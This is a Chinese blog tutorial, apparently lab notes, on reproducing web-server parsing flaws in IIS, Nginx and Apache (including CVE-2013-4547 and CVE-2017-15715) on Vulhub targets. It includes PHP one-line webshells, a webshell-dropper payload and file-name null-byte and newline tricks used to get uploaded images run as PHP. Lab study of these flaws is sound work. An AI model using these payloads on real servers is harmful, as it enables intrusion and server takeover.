中间件解析漏洞

已于 2024-09-05 18:34:52 修改
阅读量315 收藏 1
点赞数 5
文章标签: nginx apache 运维 IIS
于 2024-09-05 16:02:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141931915
版权

一:IIS

1.IIS6.X

步骤一:在iis的网站根目录新建⼀个名为x.asp的⽂件

步骤二:在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。

步骤三:在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行

2.IIS7.X

步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1前面;取消掉,并重启

步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

步骤三:将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

步骤四:蚁剑连接

二:Nginx

1.nginx_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd nginx/nginx_parsing_vulnerability
docker-compose up -d
docker ps

步骤二:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>

步骤三:访问http://172.16.1.109/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg/.php

步骤四:蚁剑连接

2.CVE-2013-4547

步骤⼀:使⽤以下命令启动靶机并通过浏览器访问靶场⻚⾯.

cd vulhub-master/nginx/CVE-2013-4547x
docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀

步骤三:在hex中将jpg后面第二个空格20改为00,放行

步骤四:访问上传后的文件,抓包

172.16.1.115:8080/uploadfiles/shell.jpg  .php

步骤五:在hex中将jpg后面第二个空格20改为00,放行

三.Apache

1.apache_parsing

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/apache_parsing_vulnerability

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a
<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

步骤三:访问shw.php,蚁剑连接

2.CVE-2017-15715

步骤一:进入Vulhub靶场并执行以下命令启动靶场..

cd /vulhub/httpd/CVE-2017-15715

docker-compose up -d

docker ps

步骤二:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php

步骤三:抓包,1.php后面加空格,hex中空格20改为0a

步骤四:放行访问1.php%0A

步骤五:蚁剑连接

2407-2 shw
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传--中间件解析漏洞
weixin_44940180的博客
08-11 1291
解析漏洞是上传漏洞的一种,解析漏洞是针对中间件apache 一、解析漏洞 Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断 比如 yijuhua.php.owf.raar “.owf”和”.raar” 这两种后缀是apache不可识别解析,apache就会把sec.php.owf.rar解析成php. 如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个test.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀 二、修复方法
中间件解析漏洞总结
qq_61553520的博客
04-20 272
这一篇和我的另外一篇文文件上传漏洞是互为姊妹篇,在利用思路会相互补充。文件上传漏洞的另外一些特殊情况,上传的文件检测严格,只能常规上传图片,但是如果中间存在一些解析漏洞的话我们就可以利用解析漏洞进行上传后门。
vulhub中间件解析漏洞复现
m0_46684679的博客
12-07 1121
vulhub中间件解析漏洞复现
中间件解析漏洞(服务器配置错误)
m0_69043895的博客
04-06 1395
AddType :在给定的文件扩展名与特定的内容类型之间建立映射AddType 是与类型表相关的,描述的是扩展名与文件类型之间的关系,例如:AddType application/x-httpd-php .jpg ,表示 .jpg 扩展名的文件就是 application/x-httpd-php 类型的。也就是说 php3 , php4 , php5 , pht , phtml 等文件后缀也是可以被当作 php 文件进行解析的。上传成功后直接访问,此时可以看到,info.php.uiottd已经成功执行。
渗透测试-中间件解析漏洞分析
lza20001103的博客
04-27 4048
中间件解析漏洞分析
中间件解析漏洞Apache解析漏洞原理和复现
A526847的博客
06-04 1407
在windows下,会直接根据最后的.来进 行分隔,将其判定为doc文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不 认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认 类型文件读取。在2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析, 导致绕过一些服务器的安全策略。这种情况,多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析
文件上传之中间件解析漏洞详解
永远是少年
10-01 2429
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件上传之中间件解析漏洞详解。 一、IIS解析漏洞 二、Apache解析漏洞 三、Nginx解析漏洞
解析漏洞——中间件
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-21 4111
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
day33 文件上传&中间件解析漏洞&编辑器安全
wanjia01的博客
11-22 1115
先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞
第一节 中间件解析漏洞-IIS6.0-01
09-15
"中间件解析漏洞-IIS6.0-01" 中间件解析漏洞是指在Web应用程序中,因服务器或中间件解析机制存在漏洞,导致攻击者可以上传恶意文件,从而控制服务器或获取敏感信息。下面将对IIS6.0中间件解析漏洞进行详细介绍。 ...
Apache Paimon:开启实时湖仓存储新时代
ith321的博客
08-30 1410
Apache Paimon:开启实时湖仓存储新时代
Apache Kafka 简介、使用场景及特点
spiker_的博客
08-28 1853
Apache Kafka 通过其高吞吐量、低延迟、可靠性和扩展性,成为现代大数据处理和实时流处理的核心组件。无论是在日志收集、实时分析、消息队列,还是在数据管道和事件溯源中,Kafka 都表现出了极高的适用性和灵活性,值得在各类数据驱动的应用场景中推广和使用。
Apache CloudStack Official Document 翻译节选(十二)
UsamaBinLaden6976498的专栏
08-29 896
快速部署一朵 Apache CloudStack 云 (一)
等保2.0 | Apache Tomcat中间件测评
2401_84434570的博客
08-30 1029
这里就谈谈等保2.0要求,对应到Apache Tomcat中间件的一些条款要求。安装步骤略过,我们直接看等保中涉及的一些参数。首先,做测评的时候我们先要记录相应的软件版本:查看版本,在tomcat目录下执行/bin/catalina.sh version,可查看对应的软件版本信息这是前期的资产情况,记录在系统构成中。然后,再根据等保的对应的每条条款,确认到中间件中应该如何查询。首先针对身份鉴别这个控制点,如果Apache Tomcat开启了管理控制台,则此控制点需要进行测评,否则为不适用。
GLM大模型 - CogVideoX:5B 开源,2B 转为 Apache 协议
m0_58966968的博客
08-29 960
为了促进社区的自主使用和开放式创新,我们现决定将参数规模更大、性能更强的产品级模型 CogVideoX-5B 开源,同时 CogVideoX-2B 的开源协议调整为更加开放的Apache 2.0协议。为进一步支持开源社区的广泛使用与开发,我们已将 CogVideoX-2B 的协议调整为 Apache 2.0,任何企业与个人均可自由使用。同时,我们推出了在线体验,并将其源代码开源,涵盖了插帧、超分辨率等先进功能,均采用开源技术方案,实现全流程开源。同样支持多种推理精度;
Apache Ignite 在处理大规模数据时有哪些优势和局限性?
最新发布
weixin_44203221的博客
09-04 493
综上所述,Apache Ignite 在处理大规模数据时提供了显著的性能优势,但也需要合理规划和配置,以避免资源分配不当、数据分区策略不当等问题。需要优化事务边界,减少不必要的事务范围,并利用 Ignite 的事务隔离级别和并发控制机制,平衡性能与数据一致性。:Ignite 利用内存计算的优势,实现了极高的读写性能,通过分布式架构,它可以将数据分散到多个节点上,从而实现了并行处理和负载均衡。:除了内存存储外,Ignite 还支持将数据持久化到磁盘,从而保证了数据的可靠性和持久性。
Spring Security与Apache Shiro:Java安全框架的比较
qq_56438516的博客
08-29 1076
Spring Security是一个功能强大且高度可定制的Java安全框架,它是Spring生态系统的一部分。Spring Security专注于为Java应用提供认证和授权,保护应用免受常见的安全攻击。Apache Shiro是一个强大且易于使用的Java安全框架,提供了认证、授权、加密和会话管理等功能。
农事管理系统
weixin_66784080的博客
09-01 1025
有了程序功能的操作,也需要对程序操作的各个功能所产生的数据信息存放在一个固定的仓库里面,这个所谓的仓库就是大家最熟悉的程序开发需要使用的数据库了,数据库能够发展到至今的模样,其实也是经历了很多的变化历程的,在最开始由于数据信息处理的需要开始推出最低级的数据管理,这个阶段也是数据库早期的人工管理的阶段,后来也经历了文件管理的阶段,这个阶段的数据管理因为信息不能够进行共享,加上管理的数据对配套的程序产生了较强的依赖性,在数据信息管理上也存在很多数据的重复记载造成数据冗余等问题。下面将对其进行分别介绍。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值